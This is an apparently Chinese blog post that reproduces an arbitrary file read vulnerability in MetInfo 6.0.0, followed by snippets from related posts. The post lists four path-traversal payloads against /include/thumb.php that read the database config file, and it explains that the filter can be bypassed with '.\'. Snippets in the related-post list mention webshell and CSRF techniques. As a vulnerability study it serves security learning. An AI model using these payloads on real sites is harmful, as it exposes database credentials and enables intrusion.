metinfo 任意文件读取漏洞复现

最新推荐文章于 2024-05-10 23:56:01 发布
最新推荐文章于 2024-05-10 23:56:01 发布
阅读量182 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChiYanq7ng/article/details/134528319
版权
本文对metinfo任意文件读取漏洞进行复现,针对metinfo6.0.0版本抓包,利用/include/thumb.php作为漏洞点,通过四次不同方式构造payload成功利用漏洞。还简要解释了漏洞原因,代码中对dir的过滤条件简单,可用.\绕过。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

metinfo 任意文件读取漏洞复现

抓包metinfo6.0.0版本

漏洞利用点     /include/thumb.php
第一次利用

/include/thumb.php?dir=..././http/..././config/config_db.php

第二次利用

/include/thumb.php?dir=.....///http/.....///config/config_db.php

第三次利用

/include/thumb.php?dir=http/.....///.....///config/config_db.php

第四次利用

/include/thumb.php?dir=http\..\..\config\config_db.php

成功利用漏洞

简要解释漏洞产生的原因

从代码分析得知dir直接由_GET[‘dir’]传递进来,设置了过滤条件,但是只设置了过滤"../"和“./”和请求头部是“http”开始,这样的过滤显然太简单了,我们可以用.\进行绕过构造payload。

metinfo_6.0.0 任意文件读取漏洞复现
薛定谔嘚喵博客
05-04 1122
MetInfo是一套使用PHP和Mysql开发的内容管理系统。MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
文件读取漏洞复现Metinfo 6.0.0)
m0_56578216的博客
08-31 1022
安装phpstudy,下载MetInfo 6.0.0版本软件,复制到phpstudy目录下的www目录中。
MetInfo任意文件读取】--任意文件读取漏洞
m0_63241485的博客
08-29 4021
任意文件读取漏洞分析
php代码审计【20】MetInfo 变量覆盖漏洞挖掘
司徒荆的博客
07-06 1010
MetInfo 变量覆盖漏洞挖掘
Metinfo v6.0.0 后台getshell
公众号shadow sock7
10-21 3841
这个漏洞在v5.3.19同样存在,不过前提是需要后台管理员的权限。但是如果是在v5.3.19,可以结合之前的管理员任意密码重置漏洞getshell。 Metinfo v5.3.19: 如文章中所说,这里的poc是: http://localhost/admin/column/save.php? name=123 &action=editor &foldername=upload &...
漏洞复现Metinfo5.0.4任意文件包含漏洞复现
过期的秋刀鱼
11-04 852
文件夹中有个新建文件shell.php,即可用蚁剑连接。下放入一张没有木马的图片,使用另一种方式制作图片木马。,当我们直接包含图片的时候,这段代码就会被执行。复制得到的base64编码格式的php代码。该段代码的含义是,在当前目录下创建一个名为。把POST请求体中的变量放到url中提交。,然后在下面写入php代码,点击send。上传图片木马,通过文件包含的方式去访问。bp拦截得到php源码的数据包。使用文件包含的方式去访问图片。该环境的文件上传点在。但是上传文件会失败,拿到webshell。
记一次MetInfo6.0.0文件包含漏洞复现
weixin_55404107的博客
10-20 1901
进行漏洞复现读取敏感文件
metinfo_5.0.4 任意文件本地包含漏洞复现metinfo_5.0.4_lfi)
薛定谔嘚喵博客
05-06 731
include/module.php” 和 $mouble 这个变量,进行跟踪,打开 …/include/module.php,module.php里还包含着 “common.inc.php” ,我们先对module.php进行代码审计。可以看到当fmodule这个变量不等于7时,它就会对$module进行验证,接着对"common.inc.php"进行跟踪。发现common.inc.php的这段代码有漏洞点,双$$符号可能存在变量覆盖漏洞。我们要让fmodule=7,绕过对$module的验证。
metinfo中csrf漏洞复现
qq_44268631的博客
08-07 401
metinfo中csrf漏洞复现 打开后台登陆http://localhost/metinfo/admin/index.php,查看添加管理员代码 发现并没有验证token 在添加管理界面随便输入一个管理信息 点击保存使用 urpsuit抓包 右键选择send to repeater 在repeater界面,右键打开cenerate csrf poc copy软件生成的poc脚本 把保存的poc放在软件同附站下,访问 点击,就可以在后台生成新的管理员账户 总结:漏洞比较鸡肋,必须拿到同站点才
漏洞复现Metinfo6.0.0任意文件读取
过期的秋刀鱼
08-31 2790
dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将。漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的。文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。漏洞名称:MetInfo任意文件读取。影响版本:MetInfo 6.0.0。
metinfo 6.0.0任意文件读取漏洞复现
SUPER131110的博客
09-01 455
设置了过滤条件,但是只设置了过滤"../"和“./”和请求头部是“http”开始,这样的过滤显然太简单了,我们可以用.\进行绕过构造payload。- 涉及的版本或软件(CMS版本、浏览器版本等)dir直接由_GET[‘dir’]传递进来。重现攻击过程所需的 payload。metinfo任意文件读取漏洞。简要解释漏洞产生的原因。打补丁,升级,上设备。
通过浏览器URL地址,5分钟内渗透你的网站!很刑很可拷!
瓦罗兰特顶级C位的博客
02-01 2130
今天我来带大家简单渗透一个小破站,通过这个案例,让你深入了解为什么很多公司都需要紧急修复各个中间件的漏洞以及进行URL解析拦截等重要操作。
学习笔记-B/S - Exploits
热门推荐
人饭子的博客
11-02 4万+
B/S - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 各类论坛/CMS框架 AEM 74CMS dedeCMS Discuz Discuz Discuz!ML Drupal ECshop Fastadmin Laravel jeecg jeewms Joomla Maccms MetIn...
漏洞挖掘姿势之metinfo 建站系统-任意文件读取漏洞
最新发布
Grace_for_it的博客
05-10 706
metinfo 建站系统 任意文件读取漏洞 漏洞挖掘
metinfo 5.3.19密码重置漏洞
公众号shadow sock7
10-17 3707
安装完成之后,即便之前已经将各目录设置为777了,到这一步时,也会将confg/config_db.php设置为只读。 查看改文件,发现确实是刚修改的。 步骤 先在一台metinfo服务器能访问的机器上设置监听80端口,如果metinfo能访问公网则可以设置公网服务器的IP,这里我就只设置为我metinfo所在虚拟机的宿主机的IP了。 C:\Users\caiqiqi>ncat -lvv...
config.db.php,数据库配置($config[db])
weixin_32818781的博客
03-10 1128
## 数据库配置微擎系统支持数据库的主从配置(一主多从),只需要进行简单的配置即可。| 变量 | 描述 || --- | --- || $config\[‘db’\]\[‘master’\]\[‘host’\] | 数据库主机地址 || $config\[‘db’\]\[‘master’\]\[‘username’\] | 数据库用户名 || $config\[‘db’\]\[‘master’\]...
Metinfo 5.3 后台getshell(远程文件包含漏洞)分析
__Curtain_
08-30 6337
最近准备入代码审计的坑,拿Metinfo来练练手,先找了下以前的版本整理下思路。 看了下大神的文章,代码审计的方法总体上分为两种:     1. 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑可以是一个函数,或者是条小小的条件判断语句。     2. 根据不同编程语言的特性,及其历史上经常产生漏洞的一些函数,功能,把这些点找出来,在分析函数调用时的参数,如果...
metinfo 6.0 任意文件读取漏洞
浅笑996的博客
12-20 2033
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\metinfo),点击确定 漏洞分析 1.点击展开左侧app\system\include\module\目录,在弹出的下拉列表中双击old_thumb.class.ph...
metinfo6.0.0文件上传
09-01
根据引用中提到的目录,在南方数据管理系统中存在文件上传漏洞。具体来说,在南方数据管理系统的旧版本中,可以利用数据库备份功能来上传恶意文件,从而获得webshell权限。而根据引用中的步骤,可以通过上传大马、绕过上传限制、利用数据库备份功能将文件另存并重命名,最后通过访问shell.asp文件来执行恶意操作。所以,metinfo文件上传漏洞可以通过南方数据管理系统的数据库备份功能来利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

池央_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值